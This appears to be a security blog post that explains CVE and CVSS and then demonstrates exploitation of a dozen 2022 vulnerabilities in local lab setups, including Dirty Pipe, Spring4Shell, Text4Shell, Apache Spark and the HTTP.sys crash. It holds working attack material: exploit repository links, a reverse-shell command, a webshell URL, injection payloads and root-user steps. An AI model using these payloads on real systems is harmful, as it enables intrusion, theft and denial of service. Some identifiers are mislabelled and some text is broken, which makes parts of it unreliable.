What is CVE or Common Vulnerabilities and Exposures?

CVE is a publicly available and free to use database / glossary of disclosed cyber security issues and their classification. This database is maintained by MITRE Corporation with funds from the U.S. Department of Homeland Security.

Each vulnerability has a unique identifier, evaluation, and listing in the MITRE glossary. This has been done to unify communication between the security and technology industries that now can refer to this standard.

The glossary uses the Common Vulnerability Scoring System or CVSS to evaluate the severity or threat level of a vulnerability. Why? We need to understand how much damage we can get from a particular security problem and then prioritize it. The assessment depends not only on the technology, but also on the business structure of the company.

Top 10 detected threats for month in Ukraine ( source )

1  Multi.Desert.gen 16,67%
2 Win32.ShadowBrokers.ae 8,89%
3 IphoneOS.Vortex.a 7,41%
4 EMSOffce.CVE-2018-0802.gen 5,19%
5 AndroidOS.Psneuter.a 4,81%
6 Win32.Agent.gen 4,81%
7 AndroidOS.Lotoor.cd 3,70%
8 AndroidOS.Lotoor.bm 3,70%
9 Win32.ShadowBrokers.aa 2,96%
10 Java.CVE-2013-1493.x 2,96%

CVE-2022-0847

Severity High Privilege escalation in Linux kernel

The vulnerability allows a local user to escalate privileges on the system. The vulnerability exists due to usage of an uninitialized resources. A local user can overwrite arbitrary file in the page cache, even if the file is read-only, and execute arbitrary code on the system with elevated privileges. The vulnerability was dubbed Dirty Pipe. Linux kernel versions newer than 5.8 are affected.

So far, the vulnerability has been patched in the following Linux kernel versions: 5.16.11 / 5.15.25 / 5.10.102

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

Usage exploit-1 Unprivileged user can change the root password to “piped”.

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):

Note!

There’s also scanner for CVE-2022-0847. Simply it shows whether the version of Kali kernel vulnerable or not

https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

Usage exploit-2 You can inject and overwrite data in read-only SUID process memory that run as root.

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):

[+] hijacking suid binary..

[+] dropping suid shell..

[+] restoring suid binary..

[+] pooping root shell..

#id

uid=0(root) gid=0(root) groups=0(root), 1001(developer)

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847

https://dirtypipe.cm4all.com/

https://www.cybersecurity-help.cz/vdb/SB2022030808

CVE-2022-0190

Severity Critical Remote code execution in Microsoft Windows

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system. The vulnerability exists due to improper input validation when processing URL within the Microsoft Windows Support Diagnostic Tool (MSDT). A remote unauthenticated attacker can trick the victim to download (for example from the email) and open a specially crafted file, which calls the ms-msdt tool and execute arbitrary OS commands on the target system. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/JohnHammond/msdt-follina.git

Usage

Info:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190

https://nvd.nist.gov/vuln/detail/CVE-2022-30190

https://www.cybersecurity-help.cz/vdb/SB2022053005

CVE-2022-0482

Severity Critical Sensitive Data Exposure in Easyappointments 1.4.3 

This vulnerability allows Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3.

Exploitation 

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/Acceis/exploit-CVE-2022-0482  

Usage 

Vulnerable website is hosted on localhost and its whole database is dumped including username, password and other PII Data of the users.

Info

https://nvd.nist.gov/vuln/detail/CVE-2022-0482 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0482 

https://packetstormsecurity.com/files/166701/Easy-Appointments-Information-Disclosure.html 

CVE-2022-26134

Severity Critical Injection in Atlassian Confluence

Confluence is a collaborative documentation and project management framework for teams. It helps track project status by offering a centralized workspace for members. This CVE uses an injection vulnerability within the OGNL (Object-Graph Navigation Language) expression language for Java that would allow an unauthenticated attacker to execute arbitrary code. OGNL is used for getting and setting properties of Java objects, amongst many other things.

Exploitation
 

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/h3v0x/CVE-2022-26134  

Usage 

Atlassian Confluence 7.3.5 is used below as a vulnerable environment. Arbitrary codes can be executed by an unauthenticated user.

Info 

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html  

https://nvd.nist.gov/vuln/detail/cve-2022-26134  

CVE-2022-0847 

Severity High Privilege Escalation in Linux Kernel 

A vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/arttnba3/CVE-2022-0847

Usage

1 Create a SHA512Crypt hash of your chosen password with openssl passwd -6 –salt THM “PASSWORD”

2 Compile the exploit using the command gcc poc.c -o exploit

3 Run the exploit to add a root user into the passwd file:

Info 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847  

https://nvd.nist.gov/vuln/detail/CVE-2022-0847  

https://tryhackme.com/room/dirtypipe  

CVE-2022-33891

Severity High Apache Spark Shell Command Injection Vulnerability

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, it checks whether a user has access permissions to view or modify the application.  If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

Exploitation 

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/HuskyHacks/cve-2022-33891 

Usage exploit-1 Check if the server is vulnerable: python3 poc.py -u http://localhost -p 8080 –check –verbose   

For vulnerable target:

For non- vulnerable target:

Usage exploit-2 You can use the poc to obtain reverse shell

python3 poc.py -u http://localhost -p 8080 –revshell -lh <IP> -lp <PORT> –verbose 

For vulnerable target:

Info 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891  

https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html 

https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc  

CVE-2022-22965 

Severity Critical Spring4Shell – Spring Core RCE 

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

Exploitation 

Start a vulnerable docker image of Spring using the command:

docker run -d -p 8082:8080 –name springrce -it vulfocus/spring-core-rce-2022-03-29 

This binds the vulnerable Spring to the address localhost:8082. Visit http://localhost:8082 to check

Clone the exploit from https://github.com/TheGejr/SpringShell and run the following command to check if the server is vulnerable

python3 exp.py –url http://localhost:8082 

You can now exploit this vulnerability by visiting the shell address and changing the value of cmd parameter.

a) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami, output of whoami is returned.

b) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls 

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965  

https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html  

https://www.oracle.com/security-alerts/cpuapr2022.html  

CVE-2022-42889 

Severity Critical Apache commons-text vulnerability

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers.

These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Apache Commons Text Version 1.5 to 1.9 are affected.

Exploitation 

Clone the repository and move inside it https://github.com/akshayithape-devops/CVE-2022-42889-POC 

Build the vulnerable application image using Docker: d

ocker build –tag=test/text4shell . 

Make a container and build the image: docker run -it -p 80:8080 –name text4shell test/text4l 

Open new terminal tab and run below command to enter into terminal of webserver docker exec -it text4shell /bin/bash

List all the files in the directory using the ls command and see text4shell-poc.jar

Open a new terminal. Make a request to the webserver. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: ${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch newfile.txt’)}

For example: the following command should trigger request to make a new file on server:

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D

Check if the file is created on the server by using ls command again. We can see that file is successfully created. This proves that arbitrary remote code execution is possible.

bash-4.4# ls
text4shell-poc.jar
bash-4.4# ls
hello.txt  ⠀⠀⠀⠀⠀test4shell-poc.jar
bash-4.4#

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889 

https://www.openwall.com/lists/oss-security/2022/10/13/4 

https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om 

CVE-2022-28346

Severity Critical SQL injection Vulnerability in Django

A SQL injection vulnerability was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4.

QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed keyword arguments.

Exploitation

Clone the repository and follow the instructions to start a vulnerable server:

https://github.com/ahsentekdemir/CVE-2022-28346 

Usage exploit-1 Check the version of sqlite database used:

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,sqlite_version(),%223%22%20–

see test-1 3.39.4 in response

Usage exploit-2 List all the tables of sqlite database

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,tbl_name,%223%22%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_n

ame%20NOT%20like%20%27sqlite_%%27%20–

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28346 

https://www.djangoproject.com/weblog/2022/apr/11/security-releases 

https://lists.debian.org/debian-lts-announce/2022/04/msg00013.html 

CVE-2022-21907

Severity Critical HTTP Protocol Stack Remote Code Execution Vulnerability 

CVE-2022-21907 (CVSSv3 9.8) is a major flaw affecting the HTTP Protocol Stack (HTTP.sys). HTTP.sys is a kernel device driver present in current Microsoft Windows operating systems that is in charge of HTTP traffic processing in services such as Microsoft IIS.

Due to this vulnerability, an attacker can trigger the infamous “Blue Screen of Death” crash in the underlying machine that runs an unpatched HTTP.sys driver. The disruption this vulnerability can cause is rather severe, and although systems might restart and function properly after one attack, subsequent attacks could lead to a complete denial of service.

Exploitation

To repro this exploit, IIS server should be up (In this case, windows 10 version 2004 (OS Build: 19041.329) is used) and open the server page at localhost.

Once the setup is done, get the IP of the host and run this curl command in terminal.

curl 192.168.0.164:80 -sH “Accept-encoding: 354429474810858105277502,753225473272192695969

091599085146218998458873428858279498120&68&**82302744837636557755**9,21204530472516

23940869443373783750655190662992171177571578371548748405709,035045705988280018190324

33815484769110241925758402724193417475718971298,895259892660286842061499776,***********

*****************267816, *, ,” 

Once the command is executed observe that the host down with the blue screen death crash.

This Poc can also be reproduced with the Git Repo: https://github.com/ZZ-SOCMAP/CVE-2022-21907

Usage

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907

https://nvd.nist.gov/vuln/detail/CVE-2022-21907

https://github.com/ZZ-SOCMAP/CVE-2022-21907

CVE-2022-21999

Severity High Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

The vulnerability (CVE-2022-21999), which has a CVSS score of 7.8 (High), allows the attacker elevated rights if exploited successfully.  A vulnerable exe should be used by a normal user, and a command in shell should be executed to elevate the role by creating an admin account on the host.

Exploitation

To replicate this vulnerability. In the host, a normal user account is required, and then a user can elevate privileges by executing a vulnerable exe to create an admin account with the default password: “Passw0rd!”

This Poc can also be reproduced with the Git Repo: https://github.com/ly4k/SpoolFool

Usage

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999

https://nvd.nist.gov/vuln/detail/CVE-2022-21999

https://github.com/ly4k/SpoolFool

CVE-2022-1388

Severity Critical F5 BIG-IP iControl REST vulnerability RCE exploit with Java

Undisclosed requests may bypass iControl REST authentication. This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.

Exploitation

To replicate this vulnerability. A Git repo on the host can be used to determine whether or not the host is vulnerable. In this case, a vulnerable host with the BIG-IP service running is used in order to identify this vulnerability.

To determine the severity here, an arbitrary code is entered, and the server successfully pings back with the desired result without any authentication mechanism.

This Poc can also be reproduced with the Git Repo: https://github.com/Zeyad-Azima/CVE-2022-1388

Usage

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://nvd.nist.gov/vuln/detail/CVE-2022-1388

https://github.com/Zeyad-Azima/CVE-2022-1388

Thanks for reading!